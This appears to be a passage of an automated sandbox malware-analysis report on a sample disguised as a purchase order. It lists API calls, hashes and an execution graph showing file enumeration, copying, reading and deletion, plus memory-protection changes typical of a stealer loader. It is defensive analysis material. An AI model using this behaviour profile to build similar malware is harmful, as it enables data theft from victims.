                                                                                                      • Instruction Fuzzy Hash: 93113675A00108AECB00DFA5C945DAEBBBAEF44344F20407AF905F62E1D7349E50DB68
                                                                                                      APIs
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000,?), ref: 0040522A
                                                                                                        • Part of subcall function 004051F2: lstrlenW.KERNEL32(00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402D94,00000000), ref: 0040523A
                                                                                                        • Part of subcall function 004051F2: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00402D94,00402D94,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,00000000,00000000,00000000), ref: 0040524D
                                                                                                        • Part of subcall function 004051F2: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nsl791D.tmp\System.dll), ref: 0040525F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405285
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040529F
                                                                                                        • Part of subcall function 004051F2: SendMessageW.USER32(?,00001013,?,00000000), ref: 004052AD
                                                                                                        • Part of subcall function 004056C3: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                        • Part of subcall function 004056C3: CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      • WaitForSingleObject.KERNEL32(00000000,00000064,00000000,000000EB,00000000), ref: 00401E80
                                                                                                      • WaitForSingleObject.KERNEL32(?,00000064,0000000F), ref: 00401E95
                                                                                                      • GetExitCodeProcess.KERNEL32(?,?), ref: 00401EA2
                                                                                                      • CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00401EC9
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: MessageSend$CloseHandleObjectProcessSingleWaitlstrlen$CodeCreateExitTextWindowlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 3585118688-0
                                                                                                      • Opcode ID: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                                                                      • Instruction ID: 663650117de36b32c607de2b5c5339e49b80fcfff4c178b035665d2e4b1c7066
                                                                                                      • Opcode Fuzzy Hash: e25249b87139e6aa3da4cb3d5fac545e17d625a69c27f26b2c2935b711216749
                                                                                                      • Instruction Fuzzy Hash: 8811A131E00204EBCF109FA0CD449EF7AB5EB44315F20447BE505B62E0C7798A82DBA9
                                                                                                      APIs
                                                                                                      • IsWindowVisible.USER32(?), ref: 00405195
                                                                                                      • CallWindowProcW.USER32(?,?,?,?), ref: 004051E6
                                                                                                        • Part of subcall function 004041E6: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 004041F8
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Window$CallMessageProcSendVisible
                                                                                                      • String ID:
                                                                                                      • API String ID: 3748168415-3916222277
                                                                                                      • Opcode ID: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction ID: 7fff49106f067b4291516d9fc604604598bdb5380bd5c908914395e8565309e0
                                                                                                      • Opcode Fuzzy Hash: 843aab861ffb3f3227d1c446d01b64cf4776ac7e98eef2f295c4549480fb80e8
                                                                                                      • Instruction Fuzzy Hash: 26015E71900609BBDB205F51ED84B6B3A26E794364F604037FA007A2D1D77A9C919F69
                                                                                                      APIs
                                                                                                      • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004256F0,Error launching installer), ref: 004056E8
                                                                                                      • CloseHandle.KERNEL32(?), ref: 004056F5
                                                                                                      Strings
                                                                                                      • Error launching installer, xrefs: 004056D6
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CloseCreateHandleProcess
                                                                                                      • String ID: Error launching installer
                                                                                                      • API String ID: 3712363035-66219284
                                                                                                      • Opcode ID: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction ID: 0bf1ed3311e3e942e0a1389e84d80c76f41ccd0b69acab1f7eccde3b1b9dfef0
                                                                                                      • Opcode Fuzzy Hash: e8775a5d6321f0dea89ce82b90cc6292b7a3bd0044cb503c25c375156348e7c2
                                                                                                      • Instruction Fuzzy Hash: D7E0E674E0020AAFDB009F64DD05D6B7B7DF710304F808521A915F2250D7B5E8108A7D
                                                                                                      APIs
                                                                                                      • FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,76232EE0,00403861,76233420,0040366C,?), ref: 004038A4
                                                                                                      • GlobalFree.KERNEL32(?), ref: 004038AB
                                                                                                      Strings
                                                                                                      • C:\Users\user\AppData\Local\Temp\, xrefs: 0040389C
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Free$GlobalLibrary
                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                      • API String ID: 1100898210-3936084776
                                                                                                      • Opcode ID: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                      • Instruction ID: 78adfbc6f23a2b3c20b59446217b09faef23a1eee4c9d5cf742f1d2697954a66
                                                                                                      • Opcode Fuzzy Hash: dd483a302f27d7fd5815fa17d0cc140b668f4dc35d1ba6fe7e243829f05c23e7
                                                                                                      • Instruction Fuzzy Hash: 2FE08C339041205BC621AF25AC08B1AB7A86F89B32F0581B6F9807B2A183746C624BD9
                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 004059E5
                                                                                                      • CharPrevW.USER32(80000000,00000000,80000000,C:\Users\user\Desktop,00402E28,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,C:\Users\user\Desktop\Purchase-Order27112024.scr.exe,80000000,00000003), ref: 004059F5
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: CharPrevlstrlen
                                                                                                      • String ID: C:\Users\user\Desktop
                                                                                                      • API String ID: 2709904686-3125694417
                                                                                                      • Opcode ID: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                      • Instruction ID: c27c0225baf4744af390cb43684771b46df34b65c4403afa93d532b781e968ba
                                                                                                      • Opcode Fuzzy Hash: 5322967536e1a0efddda02766e650d0d94df305eef9f06c9ed47c97fde570a53
                                                                                                      • Instruction Fuzzy Hash: A8D05EB3400920DAD3226B04DC0199F73ACEF1131074644AAF501A21A5DB785D808BBD
                                                                                                      APIs
                                                                                                      • GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011C7
                                                                                                      • GlobalFree.KERNEL32(00000000), ref: 100011D9
                                                                                                      • GlobalFree.KERNEL32(?), ref: 10001203
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2232296174.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2232279863.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232310367.0000000010003000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      • Associated: 00000000.00000002.2232326142.0000000010005000.00000002.00000001.01000000.00000005.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_10000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Global$Free$Alloc
                                                                                                      • String ID:
                                                                                                      • API String ID: 1780285237-0
                                                                                                      • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                      • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                      • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                      • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                      APIs
                                                                                                      • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B29
                                                                                                      • lstrcmpiA.KERNEL32(00405D53,00000000), ref: 00405B41
                                                                                                      • CharNextA.USER32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B52
                                                                                                      • lstrlenA.KERNEL32(00405D53,?,00000000,00405D53,00000000,[Rename],00000000,00000000,00000000), ref: 00405B5B
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000000.00000002.2225624737.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                      • Associated: 00000000.00000002.2225595196.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225638996.0000000000407000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000409000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000421000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000426000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.000000000042C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000434000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225657593.0000000000446000.00000004.00000001.01000000.00000003.sdmp
                                                                                                      • Associated: 00000000.00000002.2225743969.000000000044A000.00000002.00000001.01000000.00000003.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_0_2_400000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$CharNextlstrcmpi
                                                                                                      • String ID:
                                                                                                      • API String ID: 190613189-0
                                                                                                      • Opcode ID: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction ID: 19ad592fd5dcf9c9bc99336752ee576fec3eb52e2d0cc5b6bc7cc78b570e8094
                                                                                                      • Opcode Fuzzy Hash: f0f41473c1062d639537f97a351ef6b232bfd88747b8e1d85754dbc4161d6f9d
                                                                                                      • Instruction Fuzzy Hash: 5FF06231A04958AFC7129BA5DD4099FBBB8EF06350B2540A6F801F7251D674FE019BA9

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:1.7%
                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                      Signature Coverage:0.5%
                                                                                                      Total number of Nodes:215
                                                                                                      Total number of Limit Nodes:5
                                                                                                      execution_graph 8870 37001c5b 8871 37001c6b ___scrt_fastfail 8870->8871 8874 370012ee 8871->8874 8873 37001c87 8875 37001324 ___scrt_fastfail 8874->8875 8876 370013b7 GetEnvironmentVariableW 8875->8876 8900 370010f1 8876->8900 8879 370010f1 57 API calls 8880 37001465 8879->8880 8881 370010f1 57 API calls 8880->8881 8882 37001479 8881->8882 8883 370010f1 57 API calls 8882->8883 8884 3700148d 8883->8884 8885 370010f1 57 API calls 8884->8885 8886 370014a1 8885->8886 8887 370010f1 57 API calls 8886->8887 8888 370014b5 lstrlenW 8887->8888 8889 370014d9 lstrlenW 8888->8889 8899 370014d2 8888->8899 8890 370010f1 57 API calls 8889->8890 8891 37001501 lstrlenW lstrcatW 8890->8891 8892 370010f1 57 API calls 8891->8892 8893 37001539 lstrlenW lstrcatW 8892->8893 8894 370010f1 57 API calls 8893->8894 8895 3700156b lstrlenW lstrcatW 8894->8895 8896 370010f1 57 API calls 8895->8896 8897 3700159d lstrlenW lstrcatW 8896->8897 8898 370010f1 57 API calls 8897->8898 8898->8899 8899->8873 8901 37001118 ___scrt_fastfail 8900->8901 8902 37001129 lstrlenW 8901->8902 8913 37002c40 8902->8913 8904 37001148 lstrcatW lstrlenW 8905 37001177 lstrlenW FindFirstFileW 8904->8905 8906 37001168 lstrlenW 8904->8906 8907 370011a0 8905->8907 8908 370011e1 8905->8908 8906->8905 8909 370011c7 FindNextFileW 8907->8909 8910 370011aa 8907->8910 8908->8879 8909->8907 8912 370011da FindClose 8909->8912 8910->8909 8915 37001000 8910->8915 8912->8908 8914 37002c57 8913->8914 8914->8904 8914->8914 8916 37001022 ___scrt_fastfail 8915->8916 8917 370010af 8916->8917 8918 3700102f lstrcatW lstrlenW 8916->8918 8919 370010b5 lstrlenW 8917->8919 8931 370010ad 8917->8931 8920 3700105a lstrlenW 8918->8920 8921 3700106b lstrlenW 8918->8921 8946 37001e16 8919->8946 8920->8921 8932 37001e89 lstrlenW 8921->8932 8924 370010ca 8927 37001e89 5 API calls 8924->8927 8924->8931 8925 37001088 GetFileAttributesW 8926 3700109c 
8925->8926 8925->8931 8926->8931 8938 3700173a 8926->8938 8928 370010df 8927->8928 8951 370011ea 8928->8951 8931->8910 8933 37002c40 ___scrt_fastfail 8932->8933 8934 37001ea7 lstrcatW lstrlenW 8933->8934 8935 37001ed1 lstrcatW 8934->8935 8936 37001ec2 8934->8936 8935->8925 8936->8935 8937 37001ec7 lstrlenW 8936->8937 8937->8935 8939 37001747 ___scrt_fastfail 8938->8939 8966 37001cca 8939->8966 8943 3700199f 8943->8931 8944 37001824 ___scrt_fastfail _strlen 8944->8943 8986 370015da 8944->8986 8947 37001e29 8946->8947 8950 37001e4c 8946->8950 8948 37001e2d lstrlenW 8947->8948 8947->8950 8949 37001e3f lstrlenW 8948->8949 8948->8950 8949->8950 8950->8924 8952 3700120e ___scrt_fastfail 8951->8952 8953 37001e89 5 API calls 8952->8953 8954 37001220 GetFileAttributesW 8953->8954 8955 37001246 8954->8955 8956 37001235 8954->8956 8957 37001e89 5 API calls 8955->8957 8956->8955 8958 3700173a 35 API calls 8956->8958 8959 37001258 8957->8959 8958->8955 8960 370010f1 56 API calls 8959->8960 8961 3700126d 8960->8961 8962 37001e89 5 API calls 8961->8962 8963 3700127f ___scrt_fastfail 8962->8963 8964 370010f1 56 API calls 8963->8964 8965 370012e6 8964->8965 8965->8931 8967 37001cf1 ___scrt_fastfail 8966->8967 8968 37001d0f CopyFileW CreateFileW 8967->8968 8969 37001d44 DeleteFileW 8968->8969 8970 37001d55 GetFileSize 8968->8970 8975 37001808 8969->8975 8971 37001ede 22 API calls 8970->8971 8972 37001d66 ReadFile 8971->8972 8973 37001d94 CloseHandle DeleteFileW 8972->8973 8974 37001d7d CloseHandle DeleteFileW 8972->8974 8973->8975 8974->8975 8975->8943 8976 37001ede 8975->8976 8978 3700222f 8976->8978 8979 3700224e 8978->8979 8982 37002250 8978->8982 8994 3700474f 8978->8994 8999 370047e5 8978->8999 8979->8944 8981 37002908 8983 370035d2 __CxxThrowException@8 RaiseException 8981->8983 8982->8981 9006 370035d2 8982->9006 8985 37002925 8983->8985 8985->8944 8987 3700160c _strcat _strlen 8986->8987 8988 3700163c lstrlenW 8987->8988 9094 37001c9d 8988->9094 8990 37001655 lstrcatW 
lstrlenW 8991 37001678 8990->8991 8992 3700167e lstrcatW 8991->8992 8993 37001693 ___scrt_fastfail 8991->8993 8992->8993 8993->8944 9009 37004793 8994->9009 8997 3700478f 8997->8978 8998 37004765 9015 37002ada 8998->9015 9001 370056d0 _abort 8999->9001 9000 3700570e 9028 37006368 9000->9028 9001->9000 9003 370056f9 RtlAllocateHeap 9001->9003 9005 3700474f _abort 7 API calls 9001->9005 9003->9001 9004 3700570c 9003->9004 9004->8978 9005->9001 9008 370035f2 RaiseException 9006->9008 9008->8981 9010 3700479f ___scrt_is_nonwritable_in_current_image 9009->9010 9022 37005671 RtlEnterCriticalSection 9010->9022 9012 370047aa 9023 370047dc 9012->9023 9014 370047d1 _abort 9014->8998 9016 37002ae3 9015->9016 9017 37002ae5 IsProcessorFeaturePresent 9015->9017 9016->8997 9019 37002b58 9017->9019 9027 37002b1c SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 9019->9027 9021 37002c3b 9021->8997 9022->9012 9026 370056b9 RtlLeaveCriticalSection 9023->9026 9025 370047e3 9025->9014 9026->9025 9027->9021 9031 37005b7a GetLastError 9028->9031 9032 37005b93 9031->9032 9033 37005b99 9031->9033 9050 37005e08 9032->9050 9036 37005bf0 SetLastError 9033->9036 9057 3700637b 9033->9057 9038 37005bf9 9036->9038 9038->9004 9039 37005bb3 9064 3700571e 9039->9064 9043 37005bb9 9045 37005be7 SetLastError 9043->9045 9044 37005bcf 9077 3700593c 9044->9077 9045->9038 9048 3700571e _free 17 API calls 9049 37005be0 9048->9049 9049->9036 9049->9045 9082 37005c45 9050->9082 9052 37005e2f 9053 37005e47 TlsGetValue 9052->9053 9054 37005e3b 9052->9054 9053->9054 9055 37002ada _ValidateLocalCookies 5 API calls 9054->9055 9056 37005e58 9055->9056 9056->9033 9062 37006388 _abort 9057->9062 9058 370063c8 9061 37006368 __dosmaperr 19 API calls 9058->9061 9059 370063b3 RtlAllocateHeap 9060 37005bab 9059->9060 9059->9062 9060->9039 9070 37005e5e 9060->9070 9061->9060 9062->9058 9062->9059 9063 3700474f _abort 7 API calls 9062->9063 9063->9062 9065 37005729 HeapFree 9064->9065 
9069 37005752 __dosmaperr 9064->9069 9066 3700573e 9065->9066 9065->9069 9067 37006368 __dosmaperr 18 API calls 9066->9067 9068 37005744 GetLastError 9067->9068 9068->9069 9069->9043 9071 37005c45 _abort 5 API calls 9070->9071 9072 37005e85 9071->9072 9073 37005ea0 TlsSetValue 9072->9073 9076 37005e94 9072->9076 9073->9076 9074 37002ada _ValidateLocalCookies 5 API calls 9075 37005bc8 9074->9075 9075->9039 9075->9044 9076->9074 9088 37005914 9077->9088 9085 37005c71 9082->9085 9087 37005c75 __crt_fast_encode_pointer 9082->9087 9083 37005c95 9086 37005ca1 GetProcAddress 9083->9086 9083->9087 9084 37005ce1 _abort LoadLibraryExW GetLastError LoadLibraryExW FreeLibrary 9084->9085 9085->9083 9085->9084 9085->9087 9086->9087 9087->9052 9089 37005854 _abort RtlEnterCriticalSection RtlLeaveCriticalSection 9088->9089 9090 37005938 9089->9090 9091 370058c4 9090->9091 9092 37005758 _abort 20 API calls 9091->9092 9093 370058e8 9092->9093 9093->9048 9095 37001ca6 _strlen 9094->9095 9095->8990 8838 3700c7a7 8839 3700c7be 8838->8839 8844 3700c82c 8838->8844 8839->8844 8850 3700c7e6 GetModuleHandleA 8839->8850 8841 3700c872 8842 3700c835 GetModuleHandleA 8845 3700c83f 8842->8845 8843 3700c7dd 8843->8844 8843->8845 8847 3700c800 GetProcAddress 8843->8847 8844->8841 8844->8842 8844->8845 8845->8844 8846 3700c85f GetProcAddress 8845->8846 8846->8844 8847->8844 8848 3700c80d VirtualProtect 8847->8848 8848->8844 8849 3700c81c VirtualProtect 8848->8849 8849->8844 8851 3700c7ef 8850->8851 8857 3700c82c 8850->8857 8862 3700c803 GetProcAddress 8851->8862 8853 3700c7f4 8856 3700c800 GetProcAddress 8853->8856 8853->8857 8854 3700c872 8855 3700c835 GetModuleHandleA 8859 3700c83f 8855->8859 8856->8857 8858 3700c80d VirtualProtect 8856->8858 8857->8854 8857->8855 8857->8859 8858->8857 8860 3700c81c VirtualProtect 8858->8860 8859->8857 8861 3700c85f GetProcAddress 8859->8861 8860->8857 8861->8857 8863 3700c82c 8862->8863 8864 3700c80d VirtualProtect 8862->8864 8866 3700c872 8863->8866 8867 
3700c835 GetModuleHandleA 8863->8867 8864->8863 8865 3700c81c VirtualProtect 8864->8865 8865->8863 8869 3700c83f 8867->8869 8868 3700c85f GetProcAddress 8868->8869 8869->8863 8869->8868

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37001137
                                                                                                      • lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001151
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700115C
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700116D
                                                                                                      • lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700117C
                                                                                                      • FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001193
                                                                                                      • FindNextFileW.KERNELBASE(00000000,00000010), ref: 370011D0
                                                                                                      • FindClose.KERNEL32(00000000), ref: 370011DB
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000002.00000002.4600929147.0000000037001000.00000040.00001000.00020000.00000000.sdmp, Offset: 37000000, based on PE: true
                                                                                                      • Associated: 00000002.00000002.4600909505.0000000037000000.00000004.00001000.00020000.00000000.sdmp
                                                                                                      • Associated: 00000002.00000002.4600929147.0000000037016000.00000040.00001000.00020000.00000000.sdmp
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_2_2_37000000_Purchase-Order27112024.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: lstrlen$Find$File$CloseFirstNextlstrcat
                                                                                                      • String ID:
                                                                                                      • API String ID: 1083526818-0
                                                                                                      • Opcode ID: c76bb54e3f886b6b7f2cbfdaa0d21050f850b972f0e456f2d0c3e795738d35bc
                                                                                                      • Instruction ID: 9576dc298fe27232ca4e423529282f1e76a360a1b79ef055a35f90f30064f390
                                                                                                      • Opcode Fuzzy Hash: c76bb54e3f886b6b7f2cbfdaa0d21050f850b972f0e456f2d0c3e795738d35bc
                                                                                                      • Instruction Fuzzy Hash: 552193715443086BE714EB64DC49FDB7BDCFF84324F00092ABA68E3190E774D6058BA6

                                                                                                      Control-flow Graph

                                                                                                      APIs
                                                                                                      • GetEnvironmentVariableW.KERNEL32(ProgramFiles,?,00000104), ref: 37001434
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,00000002,00000000), ref: 37001137
                                                                                                        • Part of subcall function 370010F1: lstrcatW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001151
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700115C
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700116D
                                                                                                        • Part of subcall function 370010F1: lstrlenW.KERNEL32(?,?,?,?,?,?,?,00000002,00000000), ref: 3700117C
                                                                                                        • Part of subcall function 370010F1: FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00000002,00000000), ref: 37001193
                                                                                                        • Part of subcall function 370010F1: FindNextFileW.KERNELBASE(00000000,00000010), ref: 370011D0
